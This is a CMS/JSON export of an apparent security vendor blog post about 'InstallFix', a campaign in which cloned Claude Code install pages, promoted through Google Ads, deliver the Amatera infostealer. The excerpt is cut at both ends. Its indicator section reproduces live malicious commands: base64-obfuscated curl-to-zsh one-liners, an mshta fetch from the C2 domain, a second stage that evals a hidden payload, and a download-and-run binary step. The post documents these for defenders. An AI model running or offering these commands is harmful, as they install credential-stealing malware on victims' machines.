11,9819,9826,9833,9840,9847,9854,9861,9868,9875,9881,9887,9894,9900,9907,9914,9920,9926,9932,9938,9957,9969,9976,9982,9989,9996,10029,10036,10044,10051,10057,10064,10070,10077,10095,10102,10105,10113,10120,10215,10222,10228,10231,10239,10246,10253,10260,10303,10306,10313,10329,10336,10344,10554,10562,10595,10603,10612,10618,10626,10633,10641,10652,10660,10666,10674,10685,10693,10701,10709,10717,10725,10733,10744,10751],{"data":9760,"content":9764,"nodeType":996},{"target":9761},{"sys":9762},{"id":9763,"type":1001,"linkType":1002},"38JCcRQe2tN9ooHGwreoF5",[],{"data":9766,"content":9767,"nodeType":860},{},[9768],{"data":9769,"marks":9770,"value":9771,"nodeType":864},{},[],"There was a time, not that long ago, when pasting a command from a website straight into your terminal was something you’d only try once before some grizzled senior engineer beat it out of you. That’s because you’re effectively handing a website a blank cheque to execute whatever it wants on your system.",{"data":9773,"content":9774,"nodeType":860},{},[9775],{"data":9776,"marks":9777,"value":9778,"nodeType":864},{},[],"But somehow, it’s now the default. Homebrew, Rust, nvm, Bun, oh-my-zsh and hundreds of the most widely used developer tools on the planet now ship with the same instructions. Copy a “curl to bash” ( curl https://some.website | bash) one-liner from a website, paste it into your terminal, and hit enter. The entire security model boils down to \"trust the domain.\" And with AI adoption encouraging more non-technical users to work with the kind of tools that only devs used to use, this suddenly becomes a threat to a much larger, less security conscious pool of users.",{"data":9780,"content":9781,"nodeType":860},{},[9782],{"data":9783,"marks":9784,"value":9786,"nodeType":864},{},[9785],{"type":899},"It’s not hard to see how attackers can exploit this. ",{"data":9788,"content":9789,"nodeType":860},{},[9790,9794,9798],{"data":9791,"marks":9792,"value":9793,"nodeType":864},{},[],"We're tracking a technique we're calling ",{"data":9795,"marks":9796,"value":6029,"nodeType":864},{},[9797],{"type":899},{"data":9799,"marks":9800,"value":9801,"nodeType":864},{},[],": a clever social engineering attack where threat actors clone the installation pages of legitimate CLI tools and present victims with malicious install commands disguised as the real thing. In each case, the mechanic is the same: the victim sees what looks like a familiar install command, copies it, pastes it, and runs it. Except the command they run is not the one they expected.",{"data":9803,"content":9807,"nodeType":996},{"target":9804},{"sys":9805},{"id":9806,"type":1001,"linkType":1002},"6VMkuQkU5L0vObxIojI1Xw",[],{"data":9809,"content":9810,"nodeType":1005},{},[],{"data":9812,"content":9813,"nodeType":1009},{},[9814],{"data":9815,"marks":9816,"value":9818,"nodeType":864},{},[9817],{"type":899},"InstallFix Claude Code campaign teardown",{"data":9820,"content":9821,"nodeType":860},{},[9822],{"data":9823,"marks":9824,"value":9825,"nodeType":864},{},[],"All you need to make this attack work is a popular tool you can impersonate. Naturally, this makes trendy AI tools a popular choice. Then, you just need to boost your lure to deliver it to unsuspecting victims via search engine. The most common way of doing this is through sponsored results — aka malvertising. ",{"data":9827,"content":9828,"nodeType":860},{},[9829],{"data":9830,"marks":9831,"value":9832,"nodeType":864},{},[],"In the recent examples identified by Push researchers, attackers have simply cloned the installation webpages for tools and updated the installation instructions with malicious commands. ",{"data":9834,"content":9835,"nodeType":1312},{},[9836],{"data":9837,"marks":9838,"value":9839,"nodeType":864},{},[],"A new campaign targeting Claude Code",{"data":9841,"content":9842,"nodeType":860},{},[9843],{"data":9844,"marks":9845,"value":9846,"nodeType":864},{},[],"We've recently observed a campaign that puts this technique into practice against one of the fastest-growing developer tools on the market: Anthropic's Claude Code.",{"data":9848,"content":9849,"nodeType":860},{},[9850],{"data":9851,"marks":9852,"value":9853,"nodeType":864},{},[],"Claude Code is a command-line AI coding assistant that has rapidly become the go-to for both experienced developers and amateur vibe-coders. Like many modern CLI tools, the recommended installation method is a one-liner that pipes a remote script into a shell. ",{"data":9855,"content":9856,"nodeType":860},{},[9857],{"data":9858,"marks":9859,"value":9860,"nodeType":864},{},[],"The attacker's approach is straightforward. They clone the Claude Code installation page (layout, branding, documentation sidebar, and all), hosting it on a lookalike domain. The page is a near-pixel-perfect replica of the real thing. The only meaningful difference is in the installation commands themselves: instead of fetching the install script from claude.ai, the commands point to an attacker-controlled server that serves malware instead. ",{"data":9862,"content":9863,"nodeType":860},{},[9864],{"data":9865,"marks":9866,"value":9867,"nodeType":864},{},[],"Unless you’re carefully reading the URL embedded in the install one-liner (and let's be honest, almost nobody does these days), the page is indistinguishable from the real one.",{"data":9869,"content":9870,"nodeType":860},{},[9871],{"data":9872,"marks":9873,"value":9874,"nodeType":864},{},[],"You can see a video of a user being served a malicious InstallFix page below.",{"data":9876,"content":9880,"nodeType":996},{"target":9877},{"sys":9878},{"id":9879,"type":1001,"linkType":1002},"1dhirnghbpAwyCse8cjAas",[],{"data":9882,"content":9886,"nodeType":996},{"target":9883},{"sys":9884},{"id":9885,"type":1001,"linkType":1002},"5TBnCFM4Y5CoqKPchHDpyv",[],{"data":9888,"content":9889,"nodeType":860},{},[9890],{"data":9891,"marks":9892,"value":9893,"nodeType":864},{},[],"Any further interaction on the page simply redirects you to the legitimate site, too. So a victim that lands on the page and follows the fake instructions could continue normally without realizing anything had gone wrong. ",{"data":9895,"content":9899,"nodeType":996},{"target":9896},{"sys":9897},{"id":9898,"type":1001,"linkType":1002},"5g3joJSAP8y8xv2bKaLGe2",[],{"data":9901,"content":9902,"nodeType":1312},{},[9903],{"data":9904,"marks":9905,"value":9906,"nodeType":864},{},[],"Distribution via Google Ads",{"data":9908,"content":9909,"nodeType":860},{},[9910],{"data":9911,"marks":9912,"value":9913,"nodeType":864},{},[],"The fake install pages are distributed exclusively through Google Ads, specifically through sponsored search results that appear when users search for terms like \"Claude Code\", \"Claude Code install\", or \"Claude Code CLI.\"",{"data":9915,"content":9919,"nodeType":996},{"target":9916},{"sys":9917},{"id":9918,"type":1001,"linkType":1002},"3CTtrOy3q8NoMblxkLlTer",[],{"data":9921,"content":9925,"nodeType":996},{"target":9922},{"sys":9923},{"id":9924,"type":1001,"linkType":1002},"4m5rg9UhRQK0e8OfYFlIUc",[],{"data":9927,"content":9931,"nodeType":996},{"target":9928},{"sys":9929},{"id":9930,"type":1001,"linkType":1002},"25lAkq9tTZ2Mq52gs6xR8G",[],{"data":9933,"content":9937,"nodeType":996},{"target":9934},{"sys":9935},{"id":9936,"type":1001,"linkType":1002},"4f4svuW3tjhNc3kEfCwNRG",[],{"data":9939,"content":9940,"nodeType":860},{},[9941,9945,9953],{"data":9942,"marks":9943,"value":9944,"nodeType":864},{},[],"Malvertising via Google Search is an effective delivery vector because it bypasses email-based security controls entirely. There's no phishing email to flag, no suspicious link in a message. The user initiates the interaction themselves by searching for something they genuinely intend to install. This is one of the reasons that attackers are ",{"data":9946,"content":9947,"nodeType":883},{"uri":9013},[9948],{"data":9949,"marks":9950,"value":9952,"nodeType":864},{},[9951],{"type":1455},"doubling down on targeting ad manager accounts",{"data":9954,"marks":9955,"value":9956,"nodeType":864},{},[]," to be able to hijack existing ad budgets and spin up even more malicious ads.",{"data":9958,"content":9959,"nodeType":860},{},[9960,9965],{"data":9961,"marks":9962,"value":9964,"nodeType":864},{},[9963],{"type":899},"The reality is that users are going to encounter malicious links through stealthy channels like malvertising every day, just through normal internet browsing",{"data":9966,"marks":9967,"value":9968,"nodeType":864},{},[],", without being actively targeted. That said, ads can be targeted too: Google Ads can be tuned to searches coming from specific geographic locations, tailored to specific email domain matches, or specific device types (e.g. desktop, mobile, etc.). So if you've got sufficient intel on your target, you can tailor the ad accordingly. ",{"data":9970,"content":9971,"nodeType":860},{},[9972],{"data":9973,"marks":9974,"value":9975,"nodeType":864},{},[],"Since the sponsored result appears above the organic results for the legitimate Claude Code documentation and the displayed URL in the ad appears plausible, victims are more likely to quickly click and access the domain without checking it out fully. Search engines typically suppress subdomains from displayed URLs too, giving the attacker additional cover for the lookalike domain.",{"data":9977,"content":9981,"nodeType":996},{"target":9978},{"sys":9979},{"id":9980,"type":1001,"linkType":1002},"4Ihz5BcRK0NDVy0ANg2PWe",[],{"data":9983,"content":9984,"nodeType":1312},{},[9985],{"data":9986,"marks":9987,"value":9988,"nodeType":864},{},[],"The payload",{"data":9990,"content":9991,"nodeType":860},{},[9992],{"data":9993,"marks":9994,"value":9995,"nodeType":864},{},[],"The malware initiates execution through cmd.exe (PID 8444), which spawns mshta.exe (PID 8700) to retrieve and execute content from a remote URL. The command structure indicates staged execution:",{"data":9997,"content":9998,"nodeType":941},{},[9999,10009,10019],{"data":10000,"content":10001,"nodeType":945},{},[10002],{"data":10003,"content":10004,"nodeType":860},{},[10005],{"data":10006,"marks":10007,"value":10008,"nodeType":864},{},[],"cmd.exe executes a command-line instruction to launch mshta.exe with a URL parameter pointing to https://claude[.]update-version[.]com/claude",{"data":10010,"content":10011,"nodeType":945},{},[10012],{"data":10013,"content":10014,"nodeType":860},{},[10015],{"data":10016,"marks":10017,"value":10018,"nodeType":864},{},[],"mshta.exe (child process) is invoked to fetch and execute HTML/script content from the malicious domain",{"data":10020,"content":10021,"nodeType":945},{},[10022],{"data":10023,"content":10024,"nodeType":860},{},[10025],{"data":10026,"marks":10027,"value":10028,"nodeType":864},{},[],"conhost.exe (PID 8496) is spawned as a console host, likely to support command execution output",{"data":10030,"content":10031,"nodeType":860},{},[10032],{"data":10033,"marks":10034,"value":10035,"nodeType":864},{},[],"The MacOS payload also uses additional encoding and staged execution layers.",{"data":10037,"content":10038,"nodeType":860},{},[10039],{"data":10040,"marks":10041,"value":10043,"nodeType":864},{},[10042],{"type":899},"You can see the full list of IoCs at the end of the blog.   ",{"data":10045,"content":10046,"nodeType":860},{},[10047],{"data":10048,"marks":10049,"value":10050,"nodeType":864},{},[],"Our analysis shows us that the payload matches the Yara signatures for the Amatera Stealer malware, retrieved from the command-and-control domain claude[.]update-version[.]com.",{"data":10052,"content":10056,"nodeType":996},{"target":10053},{"sys":10054},{"id":10055,"type":1001,"linkType":1002},"TXcSp34sIAOKIXlKT4Lb0",[],{"data":10058,"content":10059,"nodeType":860},{},[10060],{"data":10061,"marks":10062,"value":10063,"nodeType":864},{},[],"Notably, we saw different sites executing identical binaries, further indicating that these are part of a single attacker campaign. ",{"data":10065,"content":10069,"nodeType":996},{"target":10066},{"sys":10067},{"id":10068,"type":1001,"linkType":1002},"3ExLtcl6df07BcKPsGZn42",[],{"data":10071,"content":10072,"nodeType":1312},{},[10073],{"data":10074,"marks":10075,"value":10076,"nodeType":864},{},[],"Abusing legitimate hosting services",{"data":10078,"content":10079,"nodeType":860},{},[10080,10084,10091],{"data":10081,"marks":10082,"value":10083,"nodeType":864},{},[],"Another common theme we see across pretty much every phishing site these days is the abuse of legitimate domains for hosting malicious content. This allows attackers to blend in with normal web traffic and is a core ",{"data":10085,"content":10086,"nodeType":883},{"uri":7124},[10087],{"data":10088,"marks":10089,"value":7129,"nodeType":864},{},[10090],{"type":1455},{"data":10092,"marks":10093,"value":10094,"nodeType":864},{},[],". ",{"data":10096,"content":10097,"nodeType":860},{},[10098],{"data":10099,"marks":10100,"value":10101,"nodeType":864},{},[],"In this case, we observed Cloudflare Pages (pages.dev), Squarespace, and Tencent EdgeOne being used. ",{"data":10103,"content":10104,"nodeType":1005},{},[],{"data":10106,"content":10107,"nodeType":1009},{},[10108],{"data":10109,"marks":10110,"value":10112,"nodeType":864},{},[10111],{"type":899},"A broader trend",{"data":10114,"content":10115,"nodeType":860},{},[10116],{"data":10117,"marks":10118,"value":10119,"nodeType":864},{},[],"This isn't happening in isolation. Claude and its associated tools have become a recurring target for recent malware distribution campaigns:",{"data":10121,"content":10122,"nodeType":941},{},[10123,10146,10169,10192],{"data":10124,"content":10125,"nodeType":945},{},[10126],{"data":10127,"content":10128,"nodeType":860},{},[10129,10132,10142],{"data":10130,"marks":10131,"value":21,"nodeType":864},{},[],{"data":10133,"content":10135,"nodeType":883},{"uri":10134},"https://www.bleepingcomputer.com/news/security/claude-llm-artifacts-abused-to-push-mac-infostealers-in-clickfix-attack/",[10136],{"data":10137,"marks":10138,"value":10141,"nodeType":864},{},[10139,10140],{"type":1455},{"type":899},"Fake Claude artifacts used in traditional ClickFix lures",{"data":10143,"marks":10144,"value":10145,"nodeType":864},{},[],": Attackers created public pages on the claude.ai domain itself (user-generated content that inherited the domain's trust) containing malicious terminal commands disguised as macOS utilities. These were promoted via hijacked Google Ads and viewed over 15,000 times before being taken down.",{"data":10147,"content":10148,"nodeType":945},{},[10149],{"data":10150,"content":10151,"nodeType":860},{},[10152,10155,10165],{"data":10153,"marks":10154,"value":21,"nodeType":864},{},[],{"data":10156,"content":10158,"nodeType":883},{"uri":10157},"https://hunt.io/blog/fake-homebrew-clickfix-cuckoo-stealer-macos",[10159],{"data":10160,"marks":10161,"value":10164,"nodeType":864},{},[10162,10163],{"type":1455},{"type":899},"Fake Homebrew installation pages",{"data":10166,"marks":10167,"value":10168,"nodeType":864},{},[],": Near-identical clones of the Homebrew website delivering the Cuckoo infostealer to macOS users, using the same \"copy this install command\" mechanic.",{"data":10170,"content":10171,"nodeType":945},{},[10172],{"data":10173,"content":10174,"nodeType":860},{},[10175,10178,10188],{"data":10176,"marks":10177,"value":21,"nodeType":864},{},[],{"data":10179,"content":10181,"nodeType":883},{"uri":10180},"https://www.huntress.com/blog/openclaw-github-ghostsocks-infostealer",[10182],{"data":10183,"marks":10184,"value":10187,"nodeType":864},{},[10185,10186],{"type":1455},{"type":899},"Fake OpenClaw installers on GitHub",{"data":10189,"marks":10190,"value":10191,"nodeType":864},{},[],": Malicious repositories impersonating the popular AI agent tool, boosted by Bing's AI search results, delivering infostealers and the GhostSocks proxy malware.",{"data":10193,"content":10194,"nodeType":945},{},[10195],{"data":10196,"content":10197,"nodeType":860},{},[10198,10201,10211],{"data":10199,"marks":10200,"value":21,"nodeType":864},{},[],{"data":10202,"content":10204,"nodeType":883},{"uri":10203},"https://thehackernews.com/2026/02/malicious-npm-packages-harvest-crypto.html",[10205],{"data":10206,"marks":10207,"value":10210,"nodeType":864},{},[10208,10209],{"type":1455},{"type":899},"Trojanised npm packages",{"data":10212,"marks":10213,"value":10214,"nodeType":864},{},[],": Malicious packages mimicking Claude Code's official npm package name, targeting developers who might make a typo or trust an unofficial source.",{"data":10216,"content":10217,"nodeType":860},{},[10218],{"data":10219,"marks":10220,"value":10221,"nodeType":864},{},[],"But this isn’t just a Claude problem — any tool or site that is likely to get clicks, and can be easily cloned, is a potential target for malvertising and impersonation. For example, we’ve also recently seen attackers target free web tools with clever ClickFix lures that only load after an attacker has interacted with the page — in the example below, uploading a file to remove an image background, or convert a document to PDF. These are clones of real sites that attackers have cloned because they allow them to intercept users entering common search terms. ",{"data":10223,"content":10227,"nodeType":996},{"target":10224},{"sys":10225},{"id":10226,"type":1001,"linkType":1002},"6fbQRdi1xXzMOmYTcAGDLc",[],{"data":10229,"content":10230,"nodeType":1005},{},[],{"data":10232,"content":10233,"nodeType":1312},{},[10234],{"data":10235,"marks":10236,"value":10238,"nodeType":864},{},[10237],{"type":899},"How Push detects InstallFix",{"data":10240,"content":10241,"nodeType":860},{},[10242],{"data":10243,"marks":10244,"value":10245,"nodeType":864},{},[],"Regardless of the delivery channel, whether it's a phishing email, a malvertising lure, or a fake install page, all roads lead to a web page loaded in the user's browser, and that's where Push operates.",{"data":10247,"content":10248,"nodeType":860},{},[10249],{"data":10250,"marks":10251,"value":10252,"nodeType":864},{},[],"Push sees what the user sees: the page as it renders in the browser, in real time. This means we can detect InstallFix pages by identifying the combination of signals that characterise them: lookalike domains impersonating known developer tools, copy-to-clipboard elements containing shell commands, and the presence of malvertising delivery indicators.",{"data":10254,"content":10255,"nodeType":860},{},[10256],{"data":10257,"marks":10258,"value":10259,"nodeType":864},{},[],"Because Push detects threats directly in the browser, it doesn't matter that the attack came from a Google Search ad rather than an email. There's no phishing email for a Secure Email Gateway to inspect — the user searched for and navigated to the page themselves. But the page still loads in the browser, where Push is there to catch it.",{"data":10261,"content":10262,"nodeType":860},{},[10263,10267,10276,10279,10288,10292,10300],{"data":10264,"marks":10265,"value":10266,"nodeType":864},{},[],"To learn more about how Push protects against InstallFix, ClickFix, and other browser-based attacks, ",{"data":10268,"content":10270,"nodeType":883},{"uri":10269},"https://pushsecurity.com/resources/product-brochure",[10271],{"data":10272,"marks":10273,"value":10275,"nodeType":864},{},[10274],{"type":1455},"check out our latest product overview",{"data":10277,"marks":10278,"value":3731,"nodeType":864},{},[],{"data":10280,"content":10282,"nodeType":883},{"uri":10281},"https://pushsecurity.com/product-demo/",[10283],{"data":10284,"marks":10285,"value":10287,"nodeType":864},{},[10286],{"type":1455},"visit our demo library",{"data":10289,"marks":10290,"value":10291,"nodeType":864},{},[],", or ",{"data":10293,"content":10294,"nodeType":883},{"uri":1700},[10295],{"data":10296,"marks":10297,"value":10299,"nodeType":864},{},[10298],{"type":1455},"book some time with one of our team for a live demo",{"data":10301,"marks":10302,"value":2924,"nodeType":864},{},[],{"data":10304,"content":10305,"nodeType":1005},{},[],{"data":10307,"content":10308,"nodeType":1009},{},[10309],{"data":10310,"marks":10311,"value":5571,"nodeType":864},{},[10312],{"type":899},{"data":10314,"content":10315,"nodeType":860},{},[10316,10319,10326],{"data":10317,"marks":10318,"value":7245,"nodeType":864},{},[],{"data":10320,"content":10321,"nodeType":883},{"uri":7248},[10322],{"data":10323,"marks":10324,"value":7253,"nodeType":864},{},[10325],{"type":1455},{"data":10327,"marks":10328,"value":7257,"nodeType":864},{},[],{"data":10330,"content":10331,"nodeType":860},{},[10332],{"data":10333,"marks":10334,"value":10335,"nodeType":864},{},[],"This is a fast-moving situation, with domains constantly being spun up. At the time of writing, the domains observed were:",{"data":10337,"content":10338,"nodeType":860},{},[10339],{"data":10340,"marks":10341,"value":10343,"nodeType":864},{},[10342],{"type":899},"Cloned domains:",{"data":10345,"content":10346,"nodeType":941},{},[10347,10357,10367,10377,10387,10397,10406,10416,10426,10435,10445,10455,10465,10475,10485,10495,10505,10514,10524,10534,10544],{"data":10348,"content":10349,"nodeType":945},{},[10350],{"data":10351,"content":10352,"nodeType":860},{},[10353],{"data":10354,"marks":10355,"value":10356,"nodeType":864},{},[],"claud-code[.]pages[.]dev",{"data":10358,"content":10359,"nodeType":945},{},[10360],{"data":10361,"content":10362,"nodeType":860},{},[10363],{"data":10364,"marks":10365,"value":10366,"nodeType":864},{},[],"claulastver[.]squarespace[.]com",{"data":10368,"content":10369,"nodeType":945},{},[10370],{"data":10371,"content":10372,"nodeType":860},{},[10373],{"data":10374,"marks":10375,"value":10376,"nodeType":864},{},[],"claudecode-developers[.]squarespace[.]com",{"data":10378,"content":10379,"nodeType":945},{},[10380],{"data":10381,"content":10382,"nodeType":860},{},[10383],{"data":10384,"marks":10385,"value":10386,"nodeType":864},{},[],"hgjbulk.pages[.]dev",{"data":10388,"content":10389,"nodeType":945},{},[10390],{"data":10391,"content":10392,"nodeType":860},{},[10393],{"data":10394,"marks":10395,"value":10396,"nodeType":864},{},[],"jhgyuifyfiguohi[.]pages[.]dev",{"data":10398,"content":10399,"nodeType":945},{},[10400],{"data":10401,"content":10402,"nodeType":860},{},[10403],{"data":10404,"marks":10405,"value":10386,"nodeType":864},{},[],{"data":10407,"content":10408,"nodeType":945},{},[10409],{"data":10410,"content":10411,"nodeType":860},{},[10412],{"data":10413,"marks":10414,"value":10415,"nodeType":864},{},[],"claude-code-install[.]squarespace[.]com",{"data":10417,"content":10418,"nodeType":945},{},[10419],{"data":10420,"content":10421,"nodeType":860},{},[10422],{"data":10423,"marks":10424,"value":10425,"nodeType":864},{},[],"claude-code-docs-site[.]pages[.]dev",{"data":10427,"content":10428,"nodeType":945},{},[10429],{"data":10430,"content":10431,"nodeType":860},{},[10432],{"data":10433,"marks":10434,"value":10366,"nodeType":864},{},[],{"data":10436,"content":10437,"nodeType":945},{},[10438],{"data":10439,"content":10440,"nodeType":860},{},[10441],{"data":10442,"marks":10443,"value":10444,"nodeType":864},{},[],"cladueall[.]pages[.]dev",{"data":10446,"content":10447,"nodeType":945},{},[10448],{"data":10449,"content":10450,"nodeType":860},{},[10451],{"data":10452,"marks":10453,"value":10454,"nodeType":864},{},[],"claude-code-docs-dvlr2jpuuw[.]edgeone[.]app",{"data":10456,"content":10457,"nodeType":945},{},[10458],{"data":10459,"content":10460,"nodeType":860},{},[10461],{"data":10462,"marks":10463,"value":10464,"nodeType":864},{},[],"myclauda[.]it[.]com",{"data":10466,"content":10467,"nodeType":945},{},[10468],{"data":10469,"content":10470,"nodeType":860},{},[10471],{"data":10472,"marks":10473,"value":10474,"nodeType":864},{},[],"vdsafsaf[.]it[.]com",{"data":10476,"content":10477,"nodeType":945},{},[10478],{"data":10479,"content":10480,"nodeType":860},{},[10481],{"data":10482,"marks":10483,"value":10484,"nodeType":864},{},[],"asdasdasdadsvvvvv[.]pages[.]dev/",{"data":10486,"content":10487,"nodeType":945},{},[10488],{"data":10489,"content":10490,"nodeType":860},{},[10491],{"data":10492,"marks":10493,"value":10494,"nodeType":864},{},[],"nnnnnnnnnnnnnnnnnnnnn[.]pages[.]dev",{"data":10496,"content":10497,"nodeType":945},{},[10498],{"data":10499,"content":10500,"nodeType":860},{},[10501],{"data":10502,"marks":10503,"value":10504,"nodeType":864},{},[],"claude-code-macos[.]com",{"data":10506,"content":10507,"nodeType":945},{},[10508],{"data":10509,"content":10510,"nodeType":860},{},[10511],{"data":10512,"marks":10513,"value":10425,"nodeType":864},{},[],{"data":10515,"content":10516,"nodeType":945},{},[10517],{"data":10518,"content":10519,"nodeType":860},{},[10520],{"data":10521,"marks":10522,"value":10523,"nodeType":864},{},[],"claude-code-update[.]squarespace[.]com",{"data":10525,"content":10526,"nodeType":945},{},[10527],{"data":10528,"content":10529,"nodeType":860},{},[10530],{"data":10531,"marks":10532,"value":10533,"nodeType":864},{},[],"claudecodeupdate[.]squarespace[.]com",{"data":10535,"content":10536,"nodeType":945},{},[10537],{"data":10538,"content":10539,"nodeType":860},{},[10540],{"data":10541,"marks":10542,"value":10543,"nodeType":864},{},[],"notebooklm-version-upd[.]squarespace[.]com",{"data":10545,"content":10546,"nodeType":945},{},[10547],{"data":10548,"content":10549,"nodeType":860},{},[10550],{"data":10551,"marks":10552,"value":10553,"nodeType":864},{},[],"notklmalans[.]pages[.]dev",{"data":10555,"content":10556,"nodeType":860},{},[10557],{"data":10558,"marks":10559,"value":10561,"nodeType":864},{},[10560],{"type":899},"Domains hosting malicious payload:",{"data":10563,"content":10564,"nodeType":941},{},[10565,10575,10585],{"data":10566,"content":10567,"nodeType":945},{},[10568],{"data":10569,"content":10570,"nodeType":860},{},[10571],{"data":10572,"marks":10573,"value":10574,"nodeType":864},{},[],"contatoplus[.]com",{"data":10576,"content":10577,"nodeType":945},{},[10578],{"data":10579,"content":10580,"nodeType":860},{},[10581],{"data":10582,"marks":10583,"value":10584,"nodeType":864},{},[],"sarahmoftah[.]com",{"data":10586,"content":10587,"nodeType":945},{},[10588],{"data":10589,"content":10590,"nodeType":860},{},[10591],{"data":10592,"marks":10593,"value":10594,"nodeType":864},{},[],"claude[.]update-version[.]com",{"data":10596,"content":10597,"nodeType":860},{},[10598],{"data":10599,"marks":10600,"value":10602,"nodeType":864},{},[10601],{"type":899},"Commands:",{"data":10604,"content":10605,"nodeType":860},{},[10606],{"data":10607,"marks":10608,"value":10611,"nodeType":864},{},[10609],{"type":10610},"code","curl -ksfLS $(echo 'aHR0cHM6Ly9jb250YXRvcGx1cy5jb20vY3VybC84ZDJkMjc1MzYwYWRlZGVjZmJiZDkxNTY3ZGFkZGVlZDgwZDIwYWNlYjhhYTQzMjBkMDZhMjE0ODY0OTM5NDVi'|base64 -D)| zsh",{"data":10613,"content":10614,"nodeType":860},{},[10615],{"data":10616,"marks":10617,"value":21,"nodeType":864},{},[],{"data":10619,"content":10620,"nodeType":860},{},[10621],{"data":10622,"marks":10623,"value":10625,"nodeType":864},{},[10624],{"type":10610},"curl -sfkSL $(echo 'aHR0cHM6Ly93cmljb25zdWx0LmNvbS9jdXJsLzhhZjY1YmEzODg1ZDZlMjU5NmVhMmNlMmRiNGEzYmM1ZWUwMmI4ZGViMzM2ZjlhZTkzZTI2MmM0ZGIwMGI3NTc='|base64 -D)| zsh",{"data":10627,"content":10628,"nodeType":860},{},[10629],{"data":10630,"marks":10631,"value":10632,"nodeType":864},{},[],"\n",{"data":10634,"content":10635,"nodeType":860},{},[10636],{"data":10637,"marks":10638,"value":10640,"nodeType":864},{},[10639],{"type":10610},"C:\\Windows\\SysWOW64\\mshta.exe https://claude.update-version.com/claude ",{"data":10642,"content":10643,"nodeType":860},{},[10644,10647],{"data":10645,"marks":10646,"value":10632,"nodeType":864},{},[],{"data":10648,"marks":10649,"value":10651,"nodeType":864},{},[10650],{"type":899},"Base64 decoded url:",{"data":10653,"content":10654,"nodeType":860},{},[10655],{"data":10656,"marks":10657,"value":10659,"nodeType":864},{},[10658],{"type":10610},"contatoplus[.]com/curl/8d2d275360adedecfbbd91567daddeed80d20aceb8aa4320d06a21486493945b ",{"data":10661,"content":10662,"nodeType":860},{},[10663],{"data":10664,"marks":10665,"value":21,"nodeType":864},{},[],{"data":10667,"content":10668,"nodeType":860},{},[10669],{"data":10670,"marks":10671,"value":10673,"nodeType":864},{},[10672],{"type":10610},"saramoftah[.]com/curl/958ca005af6a71be22cfcd5de82ebf5c8b809b7ee28999b6ed38bfe5d19420",{"data":10675,"content":10676,"nodeType":860},{},[10677,10680],{"data":10678,"marks":10679,"value":10632,"nodeType":864},{},[],{"data":10681,"marks":10682,"value":10684,"nodeType":864},{},[10683],{"type":899},"Second stage:",{"data":10686,"content":10687,"nodeType":860},{},[10688],{"data":10689,"marks":10690,"value":10692,"nodeType":864},{},[10691],{"type":10610},"#!/bin/zsh",{"data":10694,"content":10695,"nodeType":860},{},[10696],{"data":10697,"marks":10698,"value":10700,"nodeType":864},{},[10699],{"type":10610},"mkgrc9=$(base64 -D \u003C\u003C'PAYLOAD_END' | gunzip",{"data":10702,"content":10703,"nodeType":860},{},[10704],{"data":10705,"marks":10706,"value":10708,"nodeType":864},{},[10707],{"type":10610},"H4sIAKgRpGkC/13LPQqAMAxA4b2niAhdpGYVbxPbSoT+0UYonl5HdXwfvHHA7Uh4NVb2rAFMBpRYkH0ovgKLlLYiNqoU8y7Es80R05LwLI7Eg9bQSaSCsZ/zccsxO5j631+pbrYTnkSAAAAA",{"data":10710,"content":10711,"nodeType":860},{},[10712],{"data":10713,"marks":10714,"value":10716,"nodeType":864},{},[10715],{"type":10610},"PAYLOAD_END",{"data":10718,"content":10719,"nodeType":860},{},[10720],{"data":10721,"marks":10722,"value":10724,"nodeType":864},{},[10723],{"type":10610},")",{"data":10726,"content":10727,"nodeType":860},{},[10728],{"data":10729,"marks":10730,"value":10732,"nodeType":864},{},[10731],{"type":10610},"eval \"$mkgrc9\"",{"data":10734,"content":10735,"nodeType":860},{},[10736,10739],{"data":10737,"marks":10738,"value":10632,"nodeType":864},{},[],{"data":10740,"marks":10741,"value":10743,"nodeType":864},{},[10742],{"type":899},"Binaries:",{"data":10745,"content":10746,"nodeType":860},{},[10747],{"data":10748,"marks":10749,"value":10692,"nodeType":864},{},[10750],{"type":10610},{"data":10752,"content":10753,"nodeType":860},{},[10754],{"data":10755,"marks":10756,"value":10758,"nodeType":864},{},[10757],{"type":10610},"curl -o /tmp/helper https://saramoftah.com/n8n/update && xattr -c /tmp/helper && chmod +x /tmp/helper && /tmp/helper","InstallFix: How attackers are weaponizing malvertised install guides  ","Attackers are impersonating popular developer tools like Claude Code to distribute fake install instructions via malicious search engine ads.","2026-03-06T00:00:00.000Z","installfix",{"items":10764},[10765,10767],{"sys":10766,"name":6593},{"id":6592},{"sys":10768,"name":342},{"id":6596},{"items":10770},[10771],{"fullName":10772,"firstName":10773,"jobTitle":10774,"profilePicture":10775},"Jacques Louw","Jacques","Co-founder / CRO",{"url":10776},"https://images.ctfassets.net/y1cdw1ablpvd/39m8bektV23lnCRcEq0G8h/2a08f6276a50744f1a4b499b273f6bb2/Push_Founders_at_Cahoots_October_28_2022_by_Doug_Coombe-21.jpg",{"__typename":2059,"sys":10778,"content":10780,"title":12676,"synopsis":12677,"hashTags":59,"publishedDate":12678,"slug":12679,"tagsCollection":12680,"authorsCollection":12686},{"id":10779},"2tz0zEJCarJBkceOYk4zVg",{"json":10781},{"data":10782,"content":10783,"nodeType":856},{},[10784,10791,10820,10831,10838,10844,10856,10862,10865,10873,10880,10943,10950,10956,10959,10967,10974,10980,10988,10995,11121,11127,11133,11139,11145,11153,11160,11167,11230,11237,11243,11249,11257,11264,11271,11279,11286,11319,11326,11332,11339,11387,11394,11402,11409,11415,11422,11429,11435,11442,11475,11482,11488,11491,11499,11506,11513,11520,11525,11532,11539,11545,11552,11558,11565,11571,11578,11585,11588,11596,11612,11619,11639,11882,11889,11920,12155,12162,12169,12370,12377,12562,12565,12573,12580,12587,12599,12602,12609,12626,12643,12650,12653,12660],{"data":10785,"content":10786,"nodeType":860},{},[10787],{"data":10788,"marks":10789,"value":10790,"nodeType":864},{},[],"When Push blocks an attack in the browser, we take the opportunity to do some more digging to see what else we can find. One recent detection led us down the rabbit hole — and right into a criminal phishing panel. ",{"data":10792,"content":10793,"nodeType":860},{},[10794,10798,10804,10808,10816],{"data":10795,"marks":10796,"value":10797,"nodeType":864},{},[],"Real-time operated phishing panels have been used extensively in recent months, in vishing + phishing attacks attributed to first ",{"data":10799,"content":10800,"nodeType":883},{"uri":6259},[10801],{"data":10802,"marks":10803,"value":4087,"nodeType":864},{},[],{"data":10805,"marks":10806,"value":10807,"nodeType":864},{},[],", and more recently the 